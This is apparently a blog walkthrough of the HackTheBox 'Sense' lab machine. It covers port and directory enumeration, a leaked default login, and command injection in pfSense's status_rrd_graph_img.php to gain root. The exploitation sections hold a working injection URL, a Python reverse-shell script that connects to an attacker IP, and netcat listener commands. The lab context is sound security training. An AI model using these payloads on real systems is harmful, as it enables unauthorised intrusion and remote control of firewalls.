> ## Documentation Index
> Fetch the complete documentation index at: https://blog.daehyung.dev/llms.txt
> Use this file to discover all available pages before exploring further.

# HackTheBox Sense

> Linux machine walkthrough from enumeration to privilege escalation.

# Enumeration

## Run Nmap Scan

```bash theme={null}
nmap -p- -T4 10.129.30.207

"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-30 08:26 BST
Nmap scan report for 10.129.30.207
Host is up (0.18s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 289.74 seconds
"
```

```bash theme={null}
nmap -p 80,443 -sC -sV 10.129.30.207

"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-30 08:32 BST
Nmap scan report for 10.129.30.207
Host is up (0.18s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.129.30.207/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.40 seconds
"
```

## **View Website (Index.php)**

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/sense/untitled.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=bb25a2f87cea5d6de27e36a60c4f1943" alt="Untitled" width="1680" height="721" data-path="hackthebox-linux/images/sense/untitled.png" />

## Directory Bruteforcing (Run Gobuster)

```bash theme={null}
gobuster dir -u https://10.129.30.207/ -w /usr/share/wordlists/dirb/common.txt -k -z

"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.129.30.207/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/09/30 08:54:23 Starting gobuster in directory enumeration mode
===============================================================
/classes              (Status: 301) [Size: 0] [--> https://10.129.30.207/classes/]
/css                  (Status: 301) [Size: 0] [--> https://10.129.30.207/css/]    
/favicon.ico          (Status: 200) [Size: 1406]                                  
/includes             (Status: 301) [Size: 0] [--> https://10.129.30.207/includes/]
/index.html           (Status: 200) [Size: 329]                                    
/index.php            (Status: 200) [Size: 6690]                                   
/installer            (Status: 301) [Size: 0] [--> https://10.129.30.207/installer/]
/javascript           (Status: 301) [Size: 0] [--> https://10.129.30.207/javascript/]
/themes               (Status: 301) [Size: 0] [--> https://10.129.30.207/themes/]    
/tree                 (Status: 301) [Size: 0] [--> https://10.129.30.207/tree/]      
/widgets              (Status: 301) [Size: 0] [--> https://10.129.30.207/widgets/]   
/xmlrpc.php           (Status: 200) [Size: 384]                                      
                                                                                     
===============================================================
2023/09/30 08:56:02 Finished
===============================================================
"
```

I couldn’t find any additional hints, so ran gobuster with larger directory list with file extensions.

```bash theme={null}
gobuster dir -u https://10.129.30.207/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -x php,txt -f

"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.129.30.207/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,txt
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2023/09/30 12:49:02 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/stats.php            (Status: 200) [Size: 6690]
/edit.php             (Status: 200) [Size: 6689]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/changelog.txt        (Status: 200) [Size: 271] 
/exec.php             (Status: 200) [Size: 6689]
/graph.php            (Status: 200) [Size: 6690]
/tree/                (Status: 200) [Size: 7492]
/wizard.php           (Status: 200) [Size: 6691]
/pkg.php              (Status: 200) [Size: 6688]
/installer/           (Status: 302) [Size: 0] [--> installer.php]
/xmlrpc.php           (Status: 200) [Size: 384]                  
/reboot.php           (Status: 200) [Size: 6691]                 
/interfaces.php       (Status: 200) [Size: 6695]                 
/system-users.txt     (Status: 200) [Size: 106]                  
Progress: 400221 / 661683 (60.49%)
^C
[!] Keyboard interrupt detected, terminating.
                                                                 
===============================================================
2023/09/30 15:20:06 Finished
===============================================================
"
```

## Visit Index.html (No hints)

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/sense/untitled-1.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=8f97c55ef2591753caad4e968cbded0b" alt="Untitled" width="1680" height="793" data-path="hackthebox-linux/images/sense/untitled-1.png" />

The “Begin Installation” link redirects us to [https://10.129.30.207/dfuife.cgi](https://10.129.30.207/dfuife.cgi). Unfortunately the link didn’t work, so no attempt for shellshock exploitation.

## Finding the Credentials

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/sense/untitled-2.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=93c8dd1600c367398a130b0a24271b80" alt="Untitled" width="767" height="236" data-path="hackthebox-linux/images/sense/untitled-2.png" />

```bash theme={null}
username: rohit
password: pfsense
```

### Reference about the password

[https://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.112122](https://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.112122)

## Login to index.php and Enumerate informations

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/sense/untitled-3.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=9e58da6a19ab83962c6535b981330866" alt="Untitled" width="1680" height="722" data-path="hackthebox-linux/images/sense/untitled-3.png" />

We found that the version

# Exploitation (Using Searchsploit)

## Search for pfsense exploits

```bash theme={null}
searchsploit pfsense 2.1.3

"
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php'  | php/webapps/43560.py
---------------------------------------------- ---------------------------------
Shellcodes: No Results
"
```

## Listen to Reverse Shell and Exploit

```bash theme={null}
nc -lvnp 4444

"
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.30.207.
Ncat: Connection from 10.129.30.207:2347.
sh: can't access tty; job control turned off
# whoami 
root
"
```

```bash theme={null}
cp /usr/share/exploitdb/exploits/php/webapps/43560.py exploit.py
./exploit.py --rhost 10.129.30.207 --lhost <attacker ip> --lport 4444 --username rohit --password pfsense
```

# Exploitation (Using Burp)

## Login to pfsense to Authenticate

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/sense/untitled-4.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=704c6c65cfe146c72551ddb31dea2d46" alt="Untitled" width="829" height="858" data-path="hackthebox-linux/images/sense/untitled-4.png" />

## Requesting to “/status\_rrd\_graph\_img.php” and Pass the HTTP request to the Repeater

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/sense/untitled-5.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=01d72118b63ad399c7258e6b7640b954" alt="Untitled" width="1680" height="862" data-path="hackthebox-linux/images/sense/untitled-5.png" />

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/sense/untitled-6.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=727eb825c80531f64ad6c5b38e998ce7" alt="Untitled" width="1680" height="857" data-path="hackthebox-linux/images/sense/untitled-6.png" />

## How the command execution works

```bash theme={null}
/status_rrd_graph_img.php?database=queues;<command to execute>|nc+<attacker ip>+4444
```

## Try with various reverse shell code.

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/sense/untitled-7.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=1a6ecacfde9b7cf343eb4f3cb9bd9e24" alt="Untitled" width="1680" height="861" data-path="hackthebox-linux/images/sense/untitled-7.png" />

## Using combination of nc and python to get a reverse shell

<img src="https://mintcdn.com/student-32fdab5f/LWlODrLqTDWIzImb/hackthebox-linux/images/sense/untitled-8.png?fit=max&auto=format&n=LWlODrLqTDWIzImb&q=85&s=960061df00626afea19f08260aafe7a0" alt="Untitled" width="1680" height="862" data-path="hackthebox-linux/images/sense/untitled-8.png" />

```bash theme={null}
/status_rrd_graph_img.php?database=queues;nc+10.10.14.23+4444|python
```

The above URL request means that at first, it will request for input from the attacker ip, then pipeline the input in to python. (Means port 4444 will send the python reverse shell code(`nc -lvnp 4444 < reverse.py`) to the victim’s system, after then the victim’s system will execute the reverse shell code (`|python`) to send reverse shell to port 4443(`nc -lvnp 4443`))

```python theme={null}
import socket,subprocess,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker ip>",4443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2);
pty.spawn("sh")
```

```bash theme={null}
# Reverse shell listener for sending the reverse shell code
# Since there's no "nc -e command"
nc -lvnp 4444 < reverse.py
# Reverse shell listener for exploit
nc -lvnp 4443
```

## Reference

Ippsec - Sense

[https://youtu.be/d2nVDoVr0jE?si=Nf9Koa-AoGgi-U5I](https://youtu.be/d2nVDoVr0jE?si=Nf9Koa-AoGgi-U5I)
